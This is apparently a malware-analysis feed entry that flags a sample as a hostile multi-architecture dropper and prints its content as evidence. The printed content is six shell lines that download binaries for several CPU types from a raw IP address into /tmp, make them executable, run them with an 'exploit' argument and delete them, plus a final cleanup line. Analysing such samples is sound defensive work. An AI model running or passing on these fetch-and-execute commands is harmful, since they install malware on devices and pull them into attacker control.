Hostile 100% Download

f834c7b407c1e81ee21765c9d81c52e62c6bf0197286c49dde4883d7886547c7.unknown

Multi-arch malware dropper

Raw-IP wget world-writable fetch executeRepeated raw-IP payload download chmod execution
SHA-256f834c7b407c1e81ee21765c9d81c52e62c6bf0197286c49dde4883d7886547c7

Evidence

Curl/wget command targets an IPv4 URL lines 1–7
1cd /tmp;wget http://46.19.143.10/splmips; chmod 777 splmips;./splmips exploit;rm -rf splmips
2cd /tmp;wget http://46.19.143.10/splmpsl; chmod 777 splmpsl;./splmpsl exploit;rm -rf splmpsl
3cd /tmp;wget http://46.19.143.10/splarm; chmod 777 splarm;./splarm exploit;rm -rf splarm
4cd /tmp;wget http://46.19.143.10/splarm5; chmod 777 splarm5;./splarm5 exploit;rm -rf splarm5
5cd /tmp;wget http://46.19.143.10/splarm6; chmod 777 splarm6;./splarm6 exploit;rm -rf splarm6
6cd /tmp;wget http://46.19.143.10/splarm7; chmod 777 splarm7;./splarm7 exploit;rm -rf splarm7
7rm -rf wop

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.